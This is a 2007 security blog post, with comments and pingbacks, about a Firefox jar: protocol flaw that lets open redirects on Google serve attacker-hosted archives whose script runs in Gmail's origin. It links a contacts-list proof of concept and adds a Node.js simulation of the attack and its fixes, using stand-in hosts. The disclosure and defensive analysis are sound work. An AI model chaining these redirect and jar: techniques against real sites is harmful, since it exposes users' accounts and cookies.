I just came across pdp's finding about the jar: protocol vulnerability in Mozilla Firefox. I think it's a big issue, and the fact that it has been on Bugzilla (#369814) for way more than ten fuck*ng days is not a good thing.
According to pdp, this issue exposes to cross-site scripting any application that lets users upload compressed ZIP and JAR files. After a couple of minutes messing around with the PoCs, I figured out that sites with open redirect issues are vulnerable too: the jar: URL can point at a redirect on the trusted site that lands on an attacker-hosted archive, and the script inside the archive runs with the trusted site's origin. I've created this PoC that attacks Gmail; it's based on my previous post and it will only show your contacts list. Nothing is logged server side (as some people thought my previous PoC did). Credit to tx for discovering the open redirect issue used to exploit Google / Firefox:
http://beford.org/stuff/jarjarbinks.htm
Whose fault? Both: Google's, for having open redirect issues and not fixing them, and Mozilla Corporation's, for failing to address this problem.
What can I do to protect myself? Giorgio Maone has already added protection against this flaw to the NoScript development version.
Update: NoScript has released a stable version with jar: protection. A new Bugzilla entry (#403331) was created to fix the inappropriate redirect handling in the jar: protocol; according to the latest comments and the bug keyword, there is a patch and it will be available with Firefox 2.0.0.10.
[...] I was scratching my head this morning on the problem. Meanwhile, beford was light-years ahead of me. He managed to prove that open redirects on Google could lead to domain [...]
Pingback by Severe XSS in Google and Others due to the JAR protocol issues | GNUCITIZEN — November 10, 2007 @ 11:41 am
impressive, nice find!
Comment by pdp — November 10, 2007 @ 11:52 am
Boom! That’s a bombshell and a half….Nice find.
Though it's probably worth explaining (to people who don't want to run the PoC) that the actual issue here that makes open redirects such a problem is that the jar: protocol follows redirects, but doesn't actually change the domain.
So all redirects are vulnerable if you can get them to point to any zip file.
Comment by kuza55 — November 10, 2007 @ 12:25 pm
I just checked and redirects which use the Refresh header rather than the Location header seem to be immune.
Comment by kuza55 — November 10, 2007 @ 12:31 pm
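The mechanics described in the post and in kuza55's two comments above (jar: follows a Location redirect but keeps the origin of the URL as written; Refresh-based redirects are not followed), as an added model in Node.js. This is example code written for this page, not code from the original post, from Mozilla or from Google: the hosts redirector.example and attacker.example, the redirect parameter name `to`, the /redir, /refresh and /saferedir paths, and the "refuse any redirect inside a jar: load" hardening policy are all assumptions for the example, and fetchHead is a constructed stand-in for the network rather than a real HTTP client.

```javascript
// jar:<inner-url>!/<entry-in-archive>  ->  { inner, entry }
function parseJarUrl(url) {
  const m = /^jar:(.+?)!\/(.*)$/.exec(url);
  return m ? { inner: m[1], entry: m[2] } : null;
}

// scheme://host[:port] of an absolute http(s) URL
function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

// Build the attack URL: an open redirect on a trusted host, pointed at an
// attacker-hosted ZIP/JAR, wrapped in jar: so the browser opens the archive.
function buildJarUrl(redirectEndpoint, paramName, zipUrl, entry) {
  const u = new URL(redirectEndpoint);
  u.searchParams.set(paramName, zipUrl);
  return `jar:${u.href}!/${entry}`;
}

// Server-side fix for the redirector: only same-site or allow-listed targets.
// Relative targets resolve against the redirector itself, so they pass;
// scheme-relative ones like //attacker.example/x resolve elsewhere and fail.
function isAllowedRedirectTarget(target, allowedHosts) {
  let u;
  try { u = new URL(target, 'http://redirector.example/'); } catch (e) { return false; }
  return (u.protocol === 'http:' || u.protocol === 'https:') && allowedHosts.includes(u.host);
}

// Constructed stand-in for the network: two hypothetical hosts.
// redirector.example plays the trusted site with an open redirect,
// attacker.example hosts the archive. No real requests are made.
function fetchHead(url) {
  const u = new URL(url);
  if (u.host === 'redirector.example') {
    const target = u.searchParams.get('to');
    if (u.pathname === '/redir' && target) {
      // Open redirect: the target is not validated at all.
      return { status: 302, headers: { Location: target } };
    }
    if (u.pathname === '/refresh' && target) {
      // Same redirect via a Refresh header; the channel does not follow these.
      return { status: 200, headers: { Refresh: `0; url=${target}` } };
    }
    if (u.pathname === '/saferedir' && target) {
      return isAllowedRedirectTarget(target, ['redirector.example'])
        ? { status: 302, headers: { Location: target } }
        : { status: 400, headers: {} };
    }
    return { status: 404, headers: {} };
  }
  if (u.host === 'attacker.example') {
    return { status: 200, headers: { 'Content-Type': 'application/zip' } };
  }
  return { status: 404, headers: {} };
}

// Follow HTTP Location redirects and return the chain of URLs visited.
function resolveRedirects(url, maxHops = 5) {
  const chain = [url];
  for (let i = 0; i < maxHops; i++) {
    const current = chain[chain.length - 1];
    const r = fetchHead(current);
    if (r.status >= 300 && r.status < 400 && r.headers.Location) {
      chain.push(new URL(r.headers.Location, current).href);
    } else {
      return chain;
    }
  }
  throw new Error('too many redirects');
}

// Vulnerable behaviour as described on the page: content inside the archive
// gets the origin of the inner URL as written, even though the archive bytes
// were actually fetched from wherever the redirect chain ended.
function jarLoadVulnerable(jarUrl) {
  const { inner, entry } = parseJarUrl(jarUrl);
  const chain = resolveRedirects(inner);
  return { origin: originOf(inner), archiveFrom: chain[chain.length - 1], entry };
}

// One hardened policy (assumed for this example; not a claim about the exact
// patch Mozilla shipped): refuse any jar: load whose inner URL redirects, so
// the archive can only ever come from the host whose origin it receives.
function jarLoadHardened(jarUrl) {
  const { inner, entry } = parseJarUrl(jarUrl);
  const chain = resolveRedirects(inner);
  if (chain.length > 1) {
    return { refused: true, reason: `${chain[0]} redirected to ${chain[chain.length - 1]}` };
  }
  return { refused: false, origin: originOf(inner), archiveFrom: inner, entry };
}
```

Running jarLoadVulnerable on buildJarUrl('http://redirector.example/redir', 'to', 'http://attacker.example/evil.zip', 'evil.html') reports origin http://redirector.example while the archive came from attacker.example, which is the whole bug; the same URL through /refresh never leaves the redirector (no Location header, so nothing is followed), and through /saferedir the redirect is refused before the archive is ever fetched. Either the browser-side or the server-side check alone breaks the attack chain.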
[...] wild and the problem persists with the websites of major Internet companies, including Google. Beford.org has found a way to use the JAR exploit to get details of Google Accounts using a malicious JAR file [...]
Pingback by Firefox Security Threat - Google is vulnerable | dailyApps — November 12, 2007 @ 2:21 pm
s/languaje/language/ on jarjarbinks.htm.
Comment by Nicolas — November 12, 2007 @ 7:56 pm
Nicolas: Thanks, fixed.
Comment by beford — November 13, 2007 @ 6:02 am
[...] reported by Jesse Ruderman in February, and its redirect variant discovered and popularized by Beford with a nice Google-targeted proof of concept, spawned some interesting 3rd party coverage. Interesting, because very few of the 3rd party [...]
Pingback by hackademix.net » A Jar of Misleading Advices — November 13, 2007 @ 1:21 pm
[...] for Googleplex, asking for additional information on how this vulnerability is exploited. On the beford.org site we can read about the way the vulnerability can be exploited to take over the list [...]
Pingback by Firefox vulnerability affects Gmail users - IT Blog — November 14, 2007 @ 10:18 am
[...] security researcher, beford, found the .jar problem being compounded by open redirect issues at Google that have yet to be [...]
Pingback by Security Tips » Jarring Firefox Exploit Endangers Google Accounts — November 14, 2007 @ 2:23 pm
I could not manipulate cookies.
Does it only affect CSRF?
Comment by Luca — November 14, 2007 @ 4:13 pm
[...] that Michał Zalewski took an interest in the matter. He currently works for Googleplex. The beford.org site has a description of how the vulnerability can be exploited to take over the contacts list from [...]
Pingback by Firefox vulnerability affects Gmail users | thecamels.org — November 14, 2007 @ 9:48 pm
[...] impact at GNUCitizen. This opens this bug up to a whole new audience and… 2007-11-10 – Beford illustrates the seriousness of this issue and issues in the same family by targeting Google and Gmail and posts a new bug entry. 2007-11-10 – And then Mario posts at [...]
Pingback by ICMPECHO » Blog Archive » Firefox JAR: vulnerability - quick summary — November 15, 2007 @ 12:22 am
[...] at Googleplex, asking for additional information on how this vulnerability is exploited. On the beford.org site we can read about the way the vulnerability can be exploited to take over the list [...]
Pingback by XAM » Blog Archive » Firefox vulnerability affects Gmail users — November 15, 2007 @ 1:52 am
Luca: You should be able to read cookies. I didn't try too hard, but my first test with Gmail was a simple alert(document.cookies) and it worked.
Comment by beford — November 16, 2007 @ 6:49 am
[...] The GMail proof-of-concept is available here. [...]
Pingback by Ryan Naraine’s Zero Day mobile edition — November 17, 2007 @ 1:50 am
[...] According to Beford.org, the danger comes from this Firefox flaw combined with a lack of precaution on Gmail's part. The flaw's impact on users could be broader, but the most notable use of it so far (that we know of) is on beford.org's page. If you want to try it, you can click the link on that page that reads http://beford.org/stuff/jarjarbinks.htm; we will not give that link here. We tried it and… [...]
Pingback by Gmail can be cracked through a Firefox flaw | www.dahii.com — November 19, 2007 @ 6:09 am
[...] According to Beford.org, the danger comes from this Firefox flaw combined with a lack of precaution on Gmail's part. The flaw's impact on users could be broader, but the most notable use of it so far (that we know of) is on beford.org's page. If you want to try it, you can click the link on that page that reads http://beford.org/stuff/jarjarbinks.htm; we will not give that link here. We tried it and… [...]
Pingback by Gmail can be cracked through a Firefox flaw — Bilişimin doğru adresi… — November 19, 2007 @ 9:55 am
[...] JAR Vulnerability Continues — Link to Gmail POC November 19, 2007 Firefox jar: Protocol Vulnerability: According to pdp, this issue makes vulnerable to Cross-site scripting applications that allow [...]
Pingback by Firefox JAR Vulnerability Continues — Link to Gmail POC « lucky13 — November 19, 2007 @ 4:07 pm
[...] point out that a proof of concept has been published online demonstrating the exploitation of both problems in an attack against the popular service [...]
Pingback by BlogZilla » "JAR:" flaw in Firefox, XSS for Gmail — November 21, 2007 @ 10:14 am
[...] Corporation just released Firefox 2.0.0.10, which includes fixes against jar: URI attacks. This issue affected browsers that used the Gecko engine; a quick check showed me that only K-Meleon [...]
Pingback by beford.org » Firefox 2.0.0.10 released — November 27, 2007 @ 5:41 am